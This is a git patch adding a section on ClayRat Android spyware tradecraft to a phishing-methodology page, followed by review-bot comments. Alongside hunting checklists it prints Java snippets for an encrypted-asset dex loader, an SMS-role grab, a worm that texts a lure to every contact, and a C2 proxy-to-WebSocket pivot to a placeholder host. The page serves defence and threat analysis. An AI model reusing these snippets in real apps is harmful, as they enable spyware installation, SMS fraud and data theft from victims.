From e31c5d1278f2e58e18751dffeab581d6a9ed2aaa Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 10 Oct 2025 12:45:05 +0000 Subject: [PATCH] Add content from: ClayRat: A New Android Spyware Targeting Russia --- .../mobile-phishing-malicious-apps.md | 125 +++++++++++++++++- 1 file changed, 124 insertions(+), 1 deletion(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849f..3eebcee7b 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md 
@@ -429,6 +429,124 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - Detect installation/launch of an external NFC-relay app triggered by another app. - For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. +--- + +## Android SMS role abuse, session-based droppers with encrypted assets, and C2 obfuscation – ClayRat tradecraft + +ClayRat is a fast-evolving Android spyware family distributed via look‑alike sites and Telegram channels. Below are reusable techniques observed in the campaign that defenders and red-teamers should model and hunt for. + +### Delivery funnel: lookalike site → Telegram → APK +- Phishing pages impersonate popular apps/services and include step-by-step instructions to enable Unknown Sources on Android. +- Users are redirected to Telegram channels seeded with testimonials/metrics before receiving the APK link. This social proof reduces suspicion. + +### Session-based installer: encrypted payload in assets + fake Play update UI +- The first-stage app presents a fake “Google Play update/verification” screen. +- The functional spyware is stored as an encrypted blob under `/assets/` and decrypted only at runtime, then dynamically loaded. +- Packed variants hide most logic until decryption, hampering static analysis. + +Static triage ideas +- Unzip and look for large opaque blobs under `assets/` whose entropy is high. +- Instrument filesystem to catch a DEX/ZIP written to app-internal storage just before `DexClassLoader`/`PathClassLoader` usage. +- APKiD often shows “packer/loader” hints; network traffic may be minimal until decryption completes. + +
+Example: AES‑GCM decrypt from assets and load with DexClassLoader + +```java +// 1) Read encrypted payload from assets +byte[] enc = readAll(getAssets().open("payload.enc")); +byte[] iv = Arrays.copyOfRange(enc, 0, 12); +byte[] ct = Arrays.copyOfRange(enc, 12, enc.length); + +// 2) Decrypt (key could be hardcoded/derived from device info) +SecretKey key = new SecretKeySpec(deriveKey(), "AES"); +Cipher c = Cipher.getInstance("AES/GCM/NoPadding"); +c.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv)); +byte[] dexBytes = c.doFinal(ct); + +// 3) Persist DEX and dynamically load +File outDex = new File(getCodeCacheDir(), "p.dex"); +Files.write(outDex.toPath(), dexBytes); +DexClassLoader cl = new DexClassLoader(outDex.getPath(), getCodeCacheDir().getPath(), null, getClassLoader()); +Class core = cl.loadClass("com.spy.core.Main"); +core.getMethod("start", Context.class).invoke(core.getConstructor().newInstance(), this); +``` +
+ +### Privilege consolidation via the default SMS handler role +Requesting the device’s default SMS app role consolidates powerful capabilities behind a single consent dialog on modern Android (instead of individual runtime prompts): read/send/intercept SMS, and direct DB access. Malware leverages this to silently mass-message, steal OTPs, and exfiltrate SMS at scale. + +Minimal request flow (Android 10+): + +```java +RoleManager rm = (RoleManager) getSystemService(Context.ROLE_SERVICE); +if (rm.isRoleAvailable(RoleManager.ROLE_SMS) && !rm.isRoleHeld(RoleManager.ROLE_SMS)) { + Intent i = rm.createRequestRoleIntent(RoleManager.ROLE_SMS); + startActivityForResult(i, 1001); +} +``` + +Hunting/detection +- Alert when the default SMS handler changes to an untrusted package. +- Monitor immediate spikes in `SEND_SMS` usage and access to `content://sms` following role grant. + +### Worm-like propagation via contact list +Once SMS and contacts are accessible, the implant mass-sends lures to every contact from the victim’s number. + +```java +Cursor c = getContentResolver().query( + ContactsContract.CommonDataKinds.Phone.CONTENT_URI, + new String[]{ContactsContract.CommonDataKinds.Phone.NUMBER}, null, null, null); +SmsManager sms = SmsManager.getDefault(); +while (c.moveToNext()) { + String num = c.getString(0); + sms.sendTextMessage(num, null, "Узнай первым! ", null, null); +} +``` + +### Event‑driven control: BroadcastReceivers for SMS and calls +Receivers enable reactive execution without a foreground service. + +Manifest sketch: + +```xml + + + + + + + + + + +``` + +Observed actions include immediate front‑camera capture and upload on first run, full SMS dump, call log exfiltration, and commandable call placement. + +### C2 traffic protection, markers, and proxy/WebSocket pivot +- Early variants obfuscate with Base64 and inject the marker string `apezdolskynet` in payloads (plaintext visible after decode). Hunt for this artifact in HTTP bodies. 
+- Later builds encrypt telemetry and tasking with **AES‑GCM** and keep logic packed until runtime. +- Resilient comms: a command like `get_proxy_data` returns an HTTP/HTTPS endpoint which is converted to a (secure) WebSocket and augmented with a device ID; tasks are scheduled periodically/delayed to keep the channel alive. + +```java +String cfg = httpGet(c2+"/get_proxy_data"); // returns e.g., https://c2.tld/path +Uri u = Uri.parse(cfg); +String ws = ("https".equals(u.getScheme()) ? "wss" : "ws") + "://" + u.getHost() + + (u.getPort()!=-1?":"+u.getPort():"") + u.getPath() + "?id=" + deviceId; +// connect(ws); schedule heartbeat/retry tasks +``` + +### DFIR/Hunting checklist (ClayRat-style) +- Network: flag HTTP POST bodies that Base64‑decode to include `apezdolskynet`. +- Role events: monitor/alert on default SMS handler changes; look for mass‑SMS bursts. +- APK triage: encrypted blobs in `/assets/` with runtime `DexClassLoader` usage; fake Play update UI. +- Components: receivers for `SMS_RECEIVED` and `NEW_OUTGOING_CALL` in untrusted apps. +- Behaviour: front camera used immediately after first grant; exfil of SMS, call logs, notifications. +- Hygiene: ensure Play Protect is enabled; deploy mobile EDR/MTD and block sideloading where possible. + +--- + ## References - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign) 
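Review bot: the "Manifest sketch" under "Event-driven control: BroadcastReceivers for SMS and calls" is an empty `xml` fence (a run of blank `+` lines), so the section that promises to show the receiver registration shows nothing; either restore the `<receiver>`/`<intent-filter>` entries for the two actions the DFIR checklist later names (`SMS_RECEIVED` and `NEW_OUTGOING_CALL`) or drop the fence and keep the prose. In the AES-GCM loader example, `readAll()` and `deriveKey()` are never defined and the block also leans on `Files`, `Arrays`, `GCMParameterSpec`, `SecretKeySpec` and `DexClassLoader` without saying which imports are needed; a one-line comment marking `readAll`/`deriveKey` as placeholders would stop readers from copying it as-is. Minor: the contact-list snippet never closes the `Cursor` it opens, and the lure string `"Узнай первым! "` carries a trailing space that looks accidental.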
@@ -440,5 +558,10 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [ClayRat: A New Android Spyware Targeting Russia](https://zimperium.com/blog/clayrat-a-new-android-spyware-targeting-russia) +- [ClayRat IOCs – Zimperium GitHub](https://github.com/Zimperium/IOC/tree/master/2025-10-ClayRat) +- [Android dangerous permissions overview](https://developer.android.com/guide/topics/permissions/overview#dangerous_permissions) +- [RoleManager (default SMS app role)](https://developer.android.com/reference/android/app/role/RoleManager) +- [Google Play Protect overview](https://support.google.com/googleplay/answer/2812853?hl=en) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file
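Review bot: the only change to the banner include line is dropping its trailing newline (`-{{#include ../../banners/hacktricks-training.md}}` becomes the same text followed by `\ No newline at end of file`), which is a whitespace-only diff that will reappear as noise in every later edit to this file; keep the final newline so the hunk contains just the five new reference entries.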